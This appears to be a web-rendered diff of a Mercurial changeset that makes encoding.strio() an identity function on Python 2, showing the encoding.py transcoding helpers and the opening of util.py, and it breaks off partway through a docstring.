##// END OF EJS Templates
py3: make encoding.strio() an identity function on Python 2...
Yuya Nishihara -
r33852:f18b1153 default
parent child Browse files
Show More
@@ -1,589 +1,591 b''
1 1 # encoding.py - character transcoding support for Mercurial
2 2 #
3 3 # Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import
9 9
10 10 import array
11 11 import io
12 12 import locale
13 13 import os
14 14 import unicodedata
15 15
16 16 from . import (
17 17 error,
18 18 policy,
19 19 pycompat,
20 20 )
21 21
22 22 charencode = policy.importmod(r'charencode')
23 23
24 24 asciilower = charencode.asciilower
25 25 asciiupper = charencode.asciiupper
26 26
27 27 _sysstr = pycompat.sysstr
28 28
29 29 if pycompat.ispy3:
30 30 unichr = chr
31 31
32 32 # These unicode characters are ignored by HFS+ (Apple Technote 1150,
33 33 # "Unicode Subtleties"), so we need to ignore them in some places for
34 34 # sanity.
35 35 _ignore = [unichr(int(x, 16)).encode("utf-8") for x in
36 36 "200c 200d 200e 200f 202a 202b 202c 202d 202e "
37 37 "206a 206b 206c 206d 206e 206f feff".split()]
38 38 # verify the next function will work
39 39 assert all(i.startswith(("\xe2", "\xef")) for i in _ignore)
40 40
def hfsignoreclean(s):
    """Strip the codepoints that HFS+ ignores out of s.

    >>> hfsignoreclean(u'.h\u200cg'.encode('utf-8'))
    '.hg'
    >>> hfsignoreclean(u'.h\ufeffg'.encode('utf-8'))
    '.hg'
    """
    # every entry of _ignore starts with \xe2 or \xef (asserted at import
    # time), so a string without those bytes has nothing to strip
    if "\xe2" not in s and "\xef" not in s:
        return s
    cleaned = s
    for ignored in _ignore:
        cleaned = cleaned.replace(ignored, '')
    return cleaned
53 53
54 54 # encoding.environ is provided read-only, which may not be used to modify
55 55 # the process environment
56 56 _nativeenviron = (not pycompat.ispy3 or os.supports_bytes_environ)
57 57 if not pycompat.ispy3:
58 58 environ = os.environ # re-exports
59 59 elif _nativeenviron:
60 60 environ = os.environb # re-exports
61 61 else:
62 62 # preferred encoding isn't known yet; use utf-8 to avoid unicode error
63 63 # and recreate it once encoding is settled
64 64 environ = dict((k.encode(u'utf-8'), v.encode(u'utf-8'))
65 65 for k, v in os.environ.items()) # re-exports
66 66
67 67 _encodingfixers = {
68 68 '646': lambda: 'ascii',
69 69 'ANSI_X3.4-1968': lambda: 'ascii',
70 70 }
71 71
72 72 try:
73 73 encoding = environ.get("HGENCODING")
74 74 if not encoding:
75 75 encoding = locale.getpreferredencoding().encode('ascii') or 'ascii'
76 76 encoding = _encodingfixers.get(encoding, lambda: encoding)()
77 77 except locale.Error:
78 78 encoding = 'ascii'
79 79 encodingmode = environ.get("HGENCODINGMODE", "strict")
80 80 fallbackencoding = 'ISO-8859-1'
81 81
class localstr(bytes):
    '''Local-encoding byte string that remembers its UTF-8 original.

    The object itself holds the local bytes 'l'; the UTF-8 bytes 'u' are
    kept in '_utf8' so an unmodified string can be converted back to
    UTF-8 without loss.'''
    def __new__(cls, u, l):
        inst = super(localstr, cls).__new__(cls, l)
        inst._utf8 = u
        return inst

    def __hash__(self):
        # hash the UTF-8 form: avoid collisions in local string space
        return hash(self._utf8)
91 91
def tolocal(s):
    """
    Convert a string from internal UTF-8 to local encoding

    All internal strings should be UTF-8 but some repos before the
    implementation of locale support may contain latin1 or possibly
    other character sets. We attempt to decode everything strictly
    using UTF-8, then Latin-1, and failing that, we use UTF-8 and
    replace unknown characters.

    The localstr class is used to cache the known UTF-8 encoding of
    strings next to their local representation to allow lossless
    round-trip conversion back to UTF-8.

    Raises error.Abort if looking up one of the codecs fails
    (LookupError), hinting at the locale settings.

    >>> u = 'foo: \\xc3\\xa4' # utf-8
    >>> l = tolocal(u)
    >>> l
    'foo: ?'
    >>> fromlocal(l)
    'foo: \\xc3\\xa4'
    >>> u2 = 'foo: \\xc3\\xa1'
    >>> d = { l: 1, tolocal(u2): 2 }
    >>> len(d) # no collision
    2
    >>> 'foo: ?' in d
    False
    >>> l1 = 'foo: \\xe4' # historical latin1 fallback
    >>> l = tolocal(l1)
    >>> l
    'foo: ?'
    >>> fromlocal(l) # magically in utf-8
    'foo: \\xc3\\xa4'
    """

    try:
        try:
            # make sure string is actually stored in UTF-8
            u = s.decode('UTF-8')
            if encoding == 'UTF-8':
                # fast path
                return s
            r = u.encode(_sysstr(encoding), u"replace")
            if u == r.decode(_sysstr(encoding)):
                # r is a safe, non-lossy encoding of s
                return r
            # lossy: keep the original UTF-8 alongside the local bytes
            return localstr(s, r)
        except UnicodeDecodeError:
            # we should only get here if we're looking at an ancient changeset
            try:
                u = s.decode(_sysstr(fallbackencoding))
                r = u.encode(_sysstr(encoding), u"replace")
                if u == r.decode(_sysstr(encoding)):
                    # r is a safe, non-lossy encoding of s
                    return r
                # lossy: cache the UTF-8 re-encoding of the fallback decode
                return localstr(u.encode('UTF-8'), r)
            except UnicodeDecodeError:
                u = s.decode("utf-8", "replace") # last ditch
                # can't round-trip
                return u.encode(_sysstr(encoding), u"replace")
    except LookupError as k:
        raise error.Abort(k, hint="please check your locale settings")
153 153
def fromlocal(s):
    """
    Convert a string from the local character encoding to UTF-8

    Decoding honours the error mode given by HGENCODINGMODE (default
    'strict'): in strict mode an undecodable character aborts with an
    error message, 'replace' substitutes a special Unicode character
    for it, and 'ignore' drops it.

    A localstr is returned as its cached UTF-8 form without decoding.
    """

    # can we do a lossless round-trip?
    if isinstance(s, localstr):
        return s._utf8

    try:
        decoded = s.decode(_sysstr(encoding), _sysstr(encodingmode))
    except UnicodeDecodeError as inst:
        # quote up to 10 bytes on either side of the offending position
        begin = max(0, inst.start - 10)
        sub = s[begin:inst.start + 10]
        raise error.Abort("decoding near '%s': %s!" % (sub, inst))
    except LookupError as k:
        raise error.Abort(k, hint="please check your locale settings")
    return decoded.encode("utf-8")
177 177
def unitolocal(u):
    """Encode unicode string u as UTF-8 and convert it to a byte string of
    local encoding via tolocal()"""
    utf8 = u.encode('utf-8')
    return tolocal(utf8)
181 181
def unifromlocal(s):
    """Convert local-encoding byte string s to UTF-8 via fromlocal() and
    decode the result into a unicode string"""
    utf8 = fromlocal(s)
    return utf8.decode('utf-8')
185 185
def unimethod(bytesfunc):
    """Wrap a __bytes__()-style method so it can serve as __unicode__() or
    Python 3 __str__(): the bytes it returns are passed through
    unifromlocal()"""
    def unifunc(obj):
        localbytes = bytesfunc(obj)
        return unifromlocal(localbytes)
    return unifunc
192 192
193 193 # converter functions between native str and byte string. use these if the
194 194 # character encoding is not aware (e.g. exception message) or is known to
195 195 # be locale dependent (e.g. date formatting.)
196 196 if pycompat.ispy3:
197 197 strtolocal = unitolocal
198 198 strfromlocal = unifromlocal
199 199 strmethod = unimethod
200 200 else:
201 201 strtolocal = pycompat.identity
202 202 strfromlocal = pycompat.identity
203 203 strmethod = pycompat.identity
204 204
205 205 if not _nativeenviron:
206 206 # now encoding and helper functions are available, recreate the environ
207 207 # dict to be exported to other modules
208 208 environ = dict((tolocal(k.encode(u'utf-8')), tolocal(v.encode(u'utf-8')))
209 209 for k, v in os.environ.items()) # re-exports
210 210
# East Asian width classes counted as two columns. Ambiguous-width ("A")
# characters are included only when HGENCODINGAMBIGUOUS is set to 'wide'.
if environ.get("HGENCODINGAMBIGUOUS", "narrow") == "wide":
    _wide = _sysstr("WFA")
else:
    _wide = _sysstr("WF")
214 214
def colwidth(s):
    "Column width of local-encoding string s when displayed"
    # undecodable bytes are replaced rather than raising
    decoded = s.decode(_sysstr(encoding), u'replace')
    return ucolwidth(decoded)
218 218
def ucolwidth(d):
    "Column width of Unicode string d when displayed"
    widthclass = getattr(unicodedata, 'east_asian_width', None)
    if widthclass is None:
        # no width data available: count one column per character
        return len(d)
    # characters whose width class is listed in _wide take two columns
    return sum(2 if widthclass(ch) in _wide else 1 for ch in d)
225 225
def getcols(s, start, c):
    '''Return the substring of s beginning at byte index start whose
    colwidth() is exactly c columns.

    Candidate end offsets run from start + c up to, but not including,
    len(s); None is returned when none of them gives a c-column
    substring.'''
    for end in xrange(start + c, len(s)):
        piece = s[start:end]
        if colwidth(piece) == c:
            return piece
    return None
233 233
def trim(s, width, ellipsis='', leftside=False):
    """Trim string 's' to at most 'width' columns (including 'ellipsis').

    If 'leftside' is True, left side of string 's' is trimmed.
    'ellipsis' is always placed at trimmed side.

    If 's' cannot be decoded in the local encoding, it is trimmed by
    bytes instead of by display columns.

    >>> ellipsis = '+++'
    >>> from . import encoding
    >>> encoding.encoding = 'utf-8'
    >>> t= '1234567890'
    >>> print trim(t, 12, ellipsis=ellipsis)
    1234567890
    >>> print trim(t, 10, ellipsis=ellipsis)
    1234567890
    >>> print trim(t, 8, ellipsis=ellipsis)
    12345+++
    >>> print trim(t, 8, ellipsis=ellipsis, leftside=True)
    +++67890
    >>> print trim(t, 8)
    12345678
    >>> print trim(t, 8, leftside=True)
    34567890
    >>> print trim(t, 3, ellipsis=ellipsis)
    +++
    >>> print trim(t, 1, ellipsis=ellipsis)
    +
    >>> u = u'\u3042\u3044\u3046\u3048\u304a' # 2 x 5 = 10 columns
    >>> t = u.encode(encoding.encoding)
    >>> print trim(t, 12, ellipsis=ellipsis)
    \xe3\x81\x82\xe3\x81\x84\xe3\x81\x86\xe3\x81\x88\xe3\x81\x8a
    >>> print trim(t, 10, ellipsis=ellipsis)
    \xe3\x81\x82\xe3\x81\x84\xe3\x81\x86\xe3\x81\x88\xe3\x81\x8a
    >>> print trim(t, 8, ellipsis=ellipsis)
    \xe3\x81\x82\xe3\x81\x84+++
    >>> print trim(t, 8, ellipsis=ellipsis, leftside=True)
    +++\xe3\x81\x88\xe3\x81\x8a
    >>> print trim(t, 5)
    \xe3\x81\x82\xe3\x81\x84
    >>> print trim(t, 5, leftside=True)
    \xe3\x81\x88\xe3\x81\x8a
    >>> print trim(t, 4, ellipsis=ellipsis)
    +++
    >>> print trim(t, 4, ellipsis=ellipsis, leftside=True)
    +++
    >>> t = '\x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa' # invalid byte sequence
    >>> print trim(t, 12, ellipsis=ellipsis)
    \x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa
    >>> print trim(t, 10, ellipsis=ellipsis)
    \x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa
    >>> print trim(t, 8, ellipsis=ellipsis)
    \x11\x22\x33\x44\x55+++
    >>> print trim(t, 8, ellipsis=ellipsis, leftside=True)
    +++\x66\x77\x88\x99\xaa
    >>> print trim(t, 8)
    \x11\x22\x33\x44\x55\x66\x77\x88
    >>> print trim(t, 8, leftside=True)
    \x33\x44\x55\x66\x77\x88\x99\xaa
    >>> print trim(t, 3, ellipsis=ellipsis)
    +++
    >>> print trim(t, 1, ellipsis=ellipsis)
    +
    """
    try:
        u = s.decode(_sysstr(encoding))
    except UnicodeDecodeError:
        # undecodable input: fall back to trimming by byte count
        if len(s) <= width: # trimming is not needed
            return s
        width -= len(ellipsis)
        if width <= 0: # not enough room even for ellipsis
            # width is now <= 0, so this keeps only the part of the
            # ellipsis that fits in the originally requested width
            return ellipsis[:width + len(ellipsis)]
        if leftside:
            return ellipsis + s[-width:]
        return s[:width] + ellipsis

    if ucolwidth(u) <= width: # trimming is not needed
        return s

    width -= len(ellipsis)
    if width <= 0: # not enough room even for ellipsis
        return ellipsis[:width + len(ellipsis)]

    # uslice(i) drops i characters from the trimmed side; concat attaches
    # the ellipsis on that same side
    if leftside:
        uslice = lambda i: u[i:]
        concat = lambda s: ellipsis + s
    else:
        uslice = lambda i: u[:-i]
        concat = lambda s: s + ellipsis
    # drop one more character at a time until the remainder fits
    for i in xrange(1, len(u)):
        usub = uslice(i)
        if ucolwidth(usub) <= width:
            return concat(usub.encode(_sysstr(encoding)))
    return ellipsis # not enough room for multi-column characters
326 326
def lower(s):
    """best-effort encoding-aware lowercasing of local string s

    Tries asciilower() first; if that raises UnicodeDecodeError the
    string is decoded (from its cached UTF-8 for a localstr, else from
    the local encoding), lowercased and re-encoded.
    """
    try:
        return asciilower(s)
    except UnicodeDecodeError:
        pass
    try:
        if not isinstance(s, localstr):
            decoded = s.decode(_sysstr(encoding), _sysstr(encodingmode))
        else:
            decoded = s._utf8.decode("utf-8")

        folded = decoded.lower()
        if folded != decoded:
            return folded.encode(_sysstr(encoding))
        return s # preserve localstring
    except UnicodeError:
        return s.lower() # we don't know how to fold this except in ASCII
    except LookupError as k:
        raise error.Abort(k, hint="please check your locale settings")
347 347
def upper(s):
    """best-effort encoding-aware uppercasing of local string s

    asciiupper() handles the common case; upperfallback() takes over when
    it raises UnicodeDecodeError.
    """
    try:
        folded = asciiupper(s)
    except UnicodeDecodeError:
        folded = upperfallback(s)
    return folded
354 354
def upperfallback(s):
    """Uppercase local string s by decoding, folding and re-encoding it.

    A localstr is decoded from its cached UTF-8, anything else from the
    local encoding. If folding changes nothing, s itself is returned.
    """
    try:
        if not isinstance(s, localstr):
            decoded = s.decode(_sysstr(encoding), _sysstr(encodingmode))
        else:
            decoded = s._utf8.decode("utf-8")

        folded = decoded.upper()
        if folded != decoded:
            return folded.encode(_sysstr(encoding))
        return s # preserve localstring
    except UnicodeError:
        return s.upper() # we don't know how to fold this except in ASCII
    except LookupError as k:
        raise error.Abort(k, hint="please check your locale settings")
370 370
class normcasespecs(object):
    '''Constants describing what a platform's normcase does to ASCII strings.

    Each platform specifies one of these; it should be consistent with
    what normcase on that platform actually does.

    lower: normcase lowercases ASCII strings
    upper: normcase uppercases ASCII strings
    other: the fallback function should always be called

    This should be kept in sync with normcase_spec in util.h.'''
    other = 0
    lower = -1
    upper = 1
385 385
386 386 _jsonmap = []
387 387 _jsonmap.extend("\\u%04x" % x for x in range(32))
388 388 _jsonmap.extend(pycompat.bytechr(x) for x in range(32, 127))
389 389 _jsonmap.append('\\u007f')
390 390 _jsonmap[0x09] = '\\t'
391 391 _jsonmap[0x0a] = '\\n'
392 392 _jsonmap[0x22] = '\\"'
393 393 _jsonmap[0x5c] = '\\\\'
394 394 _jsonmap[0x08] = '\\b'
395 395 _jsonmap[0x0c] = '\\f'
396 396 _jsonmap[0x0d] = '\\r'
397 397 _paranoidjsonmap = _jsonmap[:]
398 398 _paranoidjsonmap[0x3c] = '\\u003c' # '<' (e.g. escape "</script>")
399 399 _paranoidjsonmap[0x3e] = '\\u003e' # '>'
400 400 _jsonmap.extend(pycompat.bytechr(x) for x in range(128, 256))
401 401
def jsonescape(s, paranoid=False):
    '''returns a string suitable for JSON

    JSON is problematic for us because it doesn't support non-Unicode
    bytes. To deal with this, we take the following approach:

    - localstr objects are converted back to UTF-8
    - valid UTF-8/ASCII strings are passed as-is
    - other strings are converted to UTF-8b surrogate encoding
    - apply JSON-specified string escaping

    (escapes are doubled in these tests)

    >>> jsonescape('this is a test')
    'this is a test'
    >>> jsonescape('escape characters: \\0 \\x0b \\x7f')
    'escape characters: \\\\u0000 \\\\u000b \\\\u007f'
    >>> jsonescape('escape characters: \\t \\n \\r \\" \\\\')
    'escape characters: \\\\t \\\\n \\\\r \\\\" \\\\\\\\'
    >>> jsonescape('a weird byte: \\xdd')
    'a weird byte: \\xed\\xb3\\x9d'
    >>> jsonescape('utf-8: caf\\xc3\\xa9')
    'utf-8: caf\\xc3\\xa9'
    >>> jsonescape('')
    ''

    If paranoid, non-ascii and common troublesome characters are also escaped.
    This is suitable for web output.

    >>> jsonescape('escape boundary: \\x7e \\x7f \\xc2\\x80', paranoid=True)
    'escape boundary: ~ \\\\u007f \\\\u0080'
    >>> jsonescape('a weird byte: \\xdd', paranoid=True)
    'a weird byte: \\\\udcdd'
    >>> jsonescape('utf-8: caf\\xc3\\xa9', paranoid=True)
    'utf-8: caf\\\\u00e9'
    >>> jsonescape('non-BMP: \\xf0\\x9d\\x84\\x9e', paranoid=True)
    'non-BMP: \\\\ud834\\\\udd1e'
    >>> jsonescape('<foo@example.org>', paranoid=True)
    '\\\\u003cfoo@example.org\\\\u003e'
    '''

    if paranoid:
        jm = _paranoidjsonmap
    else:
        jm = _jsonmap

    u8chars = toutf8b(s)
    try:
        # per-byte table lookup; _paranoidjsonmap only has entries for
        # 0-127, so a non-ASCII byte in paranoid mode raises IndexError
        return ''.join(jm[x] for x in bytearray(u8chars)) # fast path
    except IndexError:
        pass
    # non-BMP char is represented as UTF-16 surrogate pair
    u16codes = array.array('H', u8chars.decode('utf-8').encode('utf-16'))
    u16codes.pop(0) # drop BOM
    # ASCII still goes through the table; everything else becomes \uXXXX
    return ''.join(jm[x] if x < 128 else '\\u%04x' % x for x in u16codes)
457 457
458 458 _utf8len = [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 3, 4]
459 459
def getutf8char(s, pos):
    '''Return the complete utf-8 character of s that begins at pos.

    A UnicodeError is raised when the bytes at that position do not
    start a valid utf-8 character.
    '''

    lead = s[pos]
    # the high nibble of the lead byte tells how many bytes to try
    size = _utf8len[ord(lead) >> 4]
    if not size: # ascii
        return lead

    char = s[pos:pos + size]
    # decoding is done only for validation; the result is discarded
    char.decode("utf-8")
    return char
476 476
def toutf8b(s):
    '''convert a local, possibly-binary string into UTF-8b

    This is intended as a generic method to preserve data when working
    with schemes like JSON and XML that have no provision for
    arbitrary byte strings. As Mercurial often doesn't know
    what encoding data is in, we use so-called UTF-8b.

    If a string is already valid UTF-8 (or ASCII), it passes unmodified.
    Otherwise, unsupported bytes are mapped to UTF-16 surrogate range,
    uDC00-uDCFF.

    Principles of operation:

    - ASCII and UTF-8 data successfully round-trips and is understood
      by Unicode-oriented clients
    - filenames and file contents in arbitrary other encodings can
      be round-tripped or recovered by clueful clients
    - local strings that have a cached known UTF-8 encoding (aka
      localstr) get sent as UTF-8 so Unicode-oriented clients get the
      Unicode data they want
    - because we must preserve UTF-8 bytestring in places such as
      filenames, metadata can't be roundtripped without help

    (Note: "UTF-8b" often refers to decoding a mix of valid UTF-8 and
    arbitrary bytes into an internal Unicode format that can be
    re-encoded back into the original. Here we are exposing the
    internal surrogate encoding as a UTF-8 string.)
    '''

    # fast paths apply only when no \xed byte is present, i.e. s cannot
    # already contain an encoded U+DCxx character needing re-escaping
    if "\xed" not in s:
        if isinstance(s, localstr):
            return s._utf8
        try:
            s.decode('utf-8')
            return s
        except UnicodeDecodeError:
            pass

    r = ""
    pos = 0
    l = len(s)
    while pos < l:
        try:
            c = getutf8char(s, pos)
            if "\xed\xb0\x80" <= c <= "\xed\xb3\xbf":
                # have to re-escape existing U+DCxx characters
                # (only the first byte is consumed; the rest of the
                # sequence is handled on later iterations)
                c = unichr(0xdc00 + ord(s[pos])).encode('utf-8')
                pos += 1
            else:
                pos += len(c)
        except UnicodeDecodeError:
            # invalid byte: map it to U+DC00 + byte value
            c = unichr(0xdc00 + ord(s[pos])).encode('utf-8')
            pos += 1
        r += c
    return r
533 533
def fromutf8b(s):
    '''Given a UTF-8b string, return a local, possibly-binary string.

    return the original binary string. This
    is a round-trip process for strings like filenames, but metadata
    that was passed through tolocal will remain in UTF-8.

    >>> roundtrip = lambda x: fromutf8b(toutf8b(x)) == x
    >>> m = "\\xc3\\xa9\\x99abcd"
    >>> toutf8b(m)
    '\\xc3\\xa9\\xed\\xb2\\x99abcd'
    >>> roundtrip(m)
    True
    >>> roundtrip("\\xc2\\xc2\\x80")
    True
    >>> roundtrip("\\xef\\xbf\\xbd")
    True
    >>> roundtrip("\\xef\\xef\\xbf\\xbd")
    True
    >>> roundtrip("\\xf1\\x80\\x80\\x80\\x80")
    True
    '''

    # fast path - look for uDxxx prefixes in s
    if "\xed" not in s:
        return s

    # We could do this with the unicode type but some Python builds
    # use UTF-16 internally (issue5031) which causes non-BMP code
    # points to be escaped. Instead, we use our handy getutf8char
    # helper again to walk the string without "decoding" it.

    r = ""
    pos = 0
    l = len(s)
    while pos < l:
        c = getutf8char(s, pos)
        pos += len(c)
        # unescape U+DCxx characters
        if "\xed\xb0\x80" <= c <= "\xed\xb3\xbf":
            # the low 8 bits of the code point are the byte that
            # toutf8b() added to 0xdc00
            c = chr(ord(c.decode("utf-8")) & 0xff)
        r += c
    return r
577 577
if pycompat.ispy3:
    class strio(io.TextIOWrapper):
        """Wrapper around TextIOWrapper that respects hg's encoding assumptions.

        The wrapped buffer is always read and written using the module's
        'encoding' setting.

        Also works around Python closing streams.
        """

        # Only one constructor is kept: the earlier (buffer, **kwargs)
        # definition was shadowed by this one and therefore dead code.
        def __init__(self, buffer):
            super(strio, self).__init__(buffer, encoding=_sysstr(encoding))

        def __del__(self):
            """Override __del__ so it doesn't close the underlying stream."""
else:
    # no wrapping on Python 2: strio(fp) just returns fp
    strio = pycompat.identity
@@ -1,3777 +1,3776 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 29 import os
30 30 import platform as pyplatform
31 31 import re as remod
32 32 import shutil
33 33 import signal
34 34 import socket
35 35 import stat
36 36 import string
37 37 import subprocess
38 38 import sys
39 39 import tempfile
40 40 import textwrap
41 41 import time
42 42 import traceback
43 43 import warnings
44 44 import zlib
45 45
46 46 from . import (
47 47 encoding,
48 48 error,
49 49 i18n,
50 50 policy,
51 51 pycompat,
52 52 )
53 53
54 54 base85 = policy.importmod(r'base85')
55 55 osutil = policy.importmod(r'osutil')
56 56 parsers = policy.importmod(r'parsers')
57 57
58 58 b85decode = base85.b85decode
59 59 b85encode = base85.b85encode
60 60
61 61 cookielib = pycompat.cookielib
62 62 empty = pycompat.empty
63 63 httplib = pycompat.httplib
64 64 httpserver = pycompat.httpserver
65 65 pickle = pycompat.pickle
66 66 queue = pycompat.queue
67 67 socketserver = pycompat.socketserver
68 68 stderr = pycompat.stderr
69 69 stdin = pycompat.stdin
70 70 stdout = pycompat.stdout
71 71 stringio = pycompat.stringio
72 72 urlerr = pycompat.urlerr
73 73 urlreq = pycompat.urlreq
74 74 xmlrpclib = pycompat.xmlrpclib
75 75
76 76 # workaround for win32mbcs
77 77 _filenamebytestr = pycompat.bytestr
78 78
def isatty(fp):
    """Return fp.isatty(), or False when that raises AttributeError
    (for instance because fp has no isatty method)."""
    try:
        result = fp.isatty()
    except AttributeError:
        result = False
    return result
84 84
85 85 # glibc determines buffering on first write to stdout - if we replace a TTY
86 86 # destined stdout with a pipe destined stdout (e.g. pager), we want line
87 87 # buffering
88 88 if isatty(stdout):
89 89 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
90 90
91 91 if pycompat.osname == 'nt':
92 92 from . import windows as platform
93 93 stdout = platform.winstdout(stdout)
94 94 else:
95 95 from . import posix as platform
96 96
97 97 _ = i18n._
98 98
99 99 bindunixsocket = platform.bindunixsocket
100 100 cachestat = platform.cachestat
101 101 checkexec = platform.checkexec
102 102 checklink = platform.checklink
103 103 copymode = platform.copymode
104 104 executablepath = platform.executablepath
105 105 expandglobs = platform.expandglobs
106 106 explainexit = platform.explainexit
107 107 findexe = platform.findexe
108 108 gethgcmd = platform.gethgcmd
109 109 getuser = platform.getuser
110 110 getpid = os.getpid
111 111 groupmembers = platform.groupmembers
112 112 groupname = platform.groupname
113 113 hidewindow = platform.hidewindow
114 114 isexec = platform.isexec
115 115 isowner = platform.isowner
116 116 listdir = osutil.listdir
117 117 localpath = platform.localpath
118 118 lookupreg = platform.lookupreg
119 119 makedir = platform.makedir
120 120 nlinks = platform.nlinks
121 121 normpath = platform.normpath
122 122 normcase = platform.normcase
123 123 normcasespec = platform.normcasespec
124 124 normcasefallback = platform.normcasefallback
125 125 openhardlinks = platform.openhardlinks
126 126 oslink = platform.oslink
127 127 parsepatchoutput = platform.parsepatchoutput
128 128 pconvert = platform.pconvert
129 129 poll = platform.poll
130 130 popen = platform.popen
131 131 posixfile = platform.posixfile
132 132 quotecommand = platform.quotecommand
133 133 readpipe = platform.readpipe
134 134 rename = platform.rename
135 135 removedirs = platform.removedirs
136 136 samedevice = platform.samedevice
137 137 samefile = platform.samefile
138 138 samestat = platform.samestat
139 139 setbinary = platform.setbinary
140 140 setflags = platform.setflags
141 141 setsignalhandler = platform.setsignalhandler
142 142 shellquote = platform.shellquote
143 143 spawndetached = platform.spawndetached
144 144 split = platform.split
145 145 sshargs = platform.sshargs
146 146 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
147 147 statisexec = platform.statisexec
148 148 statislink = platform.statislink
149 149 testpid = platform.testpid
150 150 umask = platform.umask
151 151 unlink = platform.unlink
152 152 username = platform.username
153 153
154 154 try:
155 155 recvfds = osutil.recvfds
156 156 except AttributeError:
157 157 pass
158 158 try:
159 159 setprocname = osutil.setprocname
160 160 except AttributeError:
161 161 pass
162 162
163 163 # Python compatibility
164 164
165 165 _notset = object()
166 166
167 167 # disable Python's problematic floating point timestamps (issue4836)
168 168 # (Python hypocritically says you shouldn't change this behavior in
169 169 # libraries, and sure enough Mercurial is not a library.)
170 170 os.stat_float_times(False)
171 171
def safehasattr(thing, attr):
    """Return True if looking up attr on thing yields a value.

    Uses getattr() with the module's _notset sentinel as default, so an
    attribute whose value is None or otherwise falsy still counts as
    present.
    """
    found = getattr(thing, attr, _notset)
    return found is not _notset
174 174
def bytesinput(fin, fout, *args, **kwargs):
    """Prompt for a line of input using fin/fout and return it.

    sys.stdin and sys.stdout are temporarily replaced by fin and fout
    (passed through encoding.strio) while the built-in input function
    runs, and are restored afterwards even if it raises. On Python 3
    the result is passed through encoding.strtolocal().
    """
    sin, sout = sys.stdin, sys.stdout
    try:
        # strio is an identity function on Python 2, so a single
        # assignment serves both branches; the per-branch assignments
        # only repeated this one and wrapped the streams a second time
        sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
        if pycompat.ispy3:
            return encoding.strtolocal(input(*args, **kwargs))
        else:
            return raw_input(*args, **kwargs)
    finally:
        sys.stdin, sys.stdout = sin, sout
186 185
def bitsfrom(container):
    """Return the bitwise OR of every item in container (0 if empty)."""
    combined = 0
    for flag in container:
        combined |= flag
    return combined
192 191
193 192 # python 2.6 still have deprecation warning enabled by default. We do not want
194 193 # to display anything to standard user so detect if we are running test and
195 194 # only use python deprecation warning in this case.
196 195 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
197 196 if _dowarn:
198 197 # explicitly unfilter our warning for python 2.7
199 198 #
200 199 # The option of setting PYTHONWARNINGS in the test runner was investigated.
201 200 # However, module name set through PYTHONWARNINGS was exactly matched, so
202 201 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
203 202 # makes the whole PYTHONWARNINGS thing useless for our usecase.
204 203 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
205 204 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
206 205 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
207 206
def nouideprecwarn(msg, version, stacklevel=1):
    """Issue a Python native deprecation warning

    Does nothing unless the module-level _dowarn flag is set; use
    'ui.deprecwarn' when possible.

    'version' is interpolated into the notice appended to 'msg', and
    'stacklevel' is increased by one before being handed to
    warnings.warn().
    """
    if not _dowarn:
        return
    notice = ("\n(compatibility will be dropped after Mercurial-%s,"
              " update your code.)") % version
    msg += notice
    warnings.warn(msg, DeprecationWarning, stacklevel + 1)
217 216
218 217 DIGESTS = {
219 218 'md5': hashlib.md5,
220 219 'sha1': hashlib.sha1,
221 220 'sha512': hashlib.sha512,
222 221 }
223 222 # List of digest types from strongest to weakest
224 223 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
225 224
226 225 for k in DIGESTS_BY_STRENGTH:
227 226 assert k in DIGESTS
228 227
class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester(['md5', 'sha1'])
    >>> d.update('foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d['md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d['sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred(['md5', 'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        """Create one hash object per name in 'digests'.

        Aborts on a name that is not a key of DIGESTS. If 's' is
        non-empty it is fed to every hash right away.
        """
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        """Feed 'data' to every hash being computed."""
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        """Return the hex digest computed so far for digest type 'key'."""
        if key not in DIGESTS:
            # the message must use 'key'; no 'k' exists in this scope
            raise Abort(_('unknown digest type: %s') % key)
        return self._hashes[key].hexdigest()

    def __iter__(self):
        """Iterate over the names of the digests being computed."""
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None
275 274
class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

        d = digestchecker(fh, size, {'md5': '...'})

